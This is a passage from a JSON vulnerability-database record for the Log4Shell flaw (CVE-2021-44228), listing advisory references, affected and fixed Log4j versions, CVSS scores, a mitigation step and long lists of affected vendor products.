in Apache Log4j 1.2", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021", "refsource": "CISCO", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "VU#930724", "refsource": "CERT-VN", "url": "https://www.kb.cert.org/vuls/id/930724" }, { "name": "https://twitter.com/kurtseifried/status/1469345530182455296", "refsource": "MISC", "url": "https://twitter.com/kurtseifried/status/1469345530182455296" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf", "refsource": "CONFIRM", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf" }, { "name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html" }, { "name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html" }, { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html", "refsource": "CONFIRM", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html" }, { "name": "20211210 Vulnerabilities in Apache Log4j Library 
Affecting Cisco Products: December 2021", "refsource": "CISCO", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" }, { "name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" }, { "name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html" }, { "name": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html" }, { "name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html" }, { "name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html" }, { "name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf", "refsource": "CONFIRM", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf" }, { "name": "FEDORA-2021-66d6c484f3", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/" }, { "name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html", "refsource": "MISC", "url": 
"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf", "refsource": "CONFIRM", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf" }, { "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", "refsource": "CONFIRM", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf" }, { "name": "https://www.oracle.com/security-alerts/cpujan2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html" }, { "name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md", "refsource": "MISC", "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md" }, { "name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html" }, { "name": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html" }, { "name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2022/Mar/23" }, { "name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001", "refsource": "MISC", "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001" }, { "name": "https://github.com/cisagov/log4j-affected-db", 
"refsource": "MISC", "url": "https://github.com/cisagov/log4j-affected-db" }, { "name": "https://support.apple.com/kb/HT213189", "refsource": "CONFIRM", "url": "https://support.apple.com/kb/HT213189" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228", "refsource": "MISC", "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228" }, { "name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html", "refsource": "MISC", "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html" }, { "name": "20220721 Open-Xchange Security Advisory 2022-07-21", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2022/Jul/11" }, { "name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html" }, { "name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html" }, { "name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2022/Dec/2" }, { "name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html" } ] }, "source": { "discovery": "UNKNOWN" } }, "gitlab.com": { "advisories": [ { "affected_range": "(,0)", "affected_versions": "None", "cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", 
"cwe_ids": [ "CWE-1035", "CWE-502", "CWE-937" ], "date": "2021-12-13", "description": "This advisory has been marked as a false positive.", "fixed_versions": [], "identifier": "CVE-2021-44228", "identifiers": [ "CVE-2021-44228", "GHSA-jfh8-c2jp-5v3q" ], "not_impacted": "", "package_slug": "maven/org.apache.logging.log4j/log4j-api", "pubdate": "2021-12-10", "solution": "Nothing to be done.", "title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)", "urls": [ "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" ], "uuid": "1f39f0d1-1df2-4f3e-b68c-41fa5952b444" }, { "affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)", "affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0", "cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwe_ids": [ "CWE-1035", "CWE-20", "CWE-937" ], "date": "2023-04-03", "description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. 
In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).", "fixed_versions": [ "2.3.2", "2.12.2", "2.15.0" ], "identifier": "CVE-2021-44228", "identifiers": [ "CVE-2021-44228", "GHSA-jfh8-c2jp-5v3q" ], "not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0", "package_slug": "maven/org.apache.logging.log4j/log4j-core", "pubdate": "2021-12-10", "solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.", "title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)", "urls": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" ], "uuid": "a1a68216-be96-42ea-a47c-5e4fc4f8318c" }, { "affected_range": "[2.0,2.3.1],[2.4.0,2.12.2),[2.13.0,2.15.0)", "affected_versions": "All versions starting from 2.0 up to 2.3.1, all versions starting from 2.4.0 before 2.12.2, all versions starting from 2.13.0 before 2.15.0", "cvss_v2": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "cwe_ids": [ "CWE-1035", "CWE-20", "CWE-937" ], "date": "2023-04-03", "description": "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j, this behavior has been disabled by default. 
In previous releases (\u003e2.10) this behavior can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true` or it can be mitigated in prior releases (\u003c2.10) by removing the JndiLookup class from the classpath (example, `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).", "fixed_versions": [ "2.3.2", "2.12.2", "2.15.0" ], "identifier": "CVE-2021-44228", "identifiers": [ "CVE-2021-44228", "GHSA-jfh8-c2jp-5v3q" ], "not_impacted": "All versions before 2.0, all versions after 2.3.1 before 2.4.0, all versions starting from 2.12.2 before 2.13.0, all versions starting from 2.15.0", "package_slug": "maven/org.apache.logging.log4j/log4j", "pubdate": "2021-12-10", "solution": "Upgrade to versions 2.3.2, 2.12.2, 2.15.0 or above.", "title": "Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)", "urls": [ "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" ], "uuid": "4e9a17d3-27b2-49e3-b977-f017a4855aa7" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.15.0", "versionStartIncluding": "2.13.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.3.1", "versionStartIncluding": "2.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", "cpe_name": [], 
"versionEndExcluding": "2.12.2", "versionStartIncluding": "2.4.0", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:sppa-t3000_ses3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.70", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_command:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.16.2.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", 
"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:gma-manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.6.2j-398", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:e-car_operation_center:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2021-12-13", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 
"cpe23Uri": "cpe:2.3:a:siemens:navigator:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2021-12-13", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:vesys:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2019.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.30", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2020", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:operation_scheduler:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.1.3", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:opcenter_intelligence:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:mindsphere:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2021-12-11", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management_hub:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2021-12-13", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:siemens:captial:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2019.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*", "cpe_name": [], 
"vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:intel:data_center_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.12", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*", 
"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.4.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "11.3\\(1\\)", "vulnerable": true }, { "cpe23Uri": 
"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "12.5\\(1\\)", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*", "cpe_name": [], 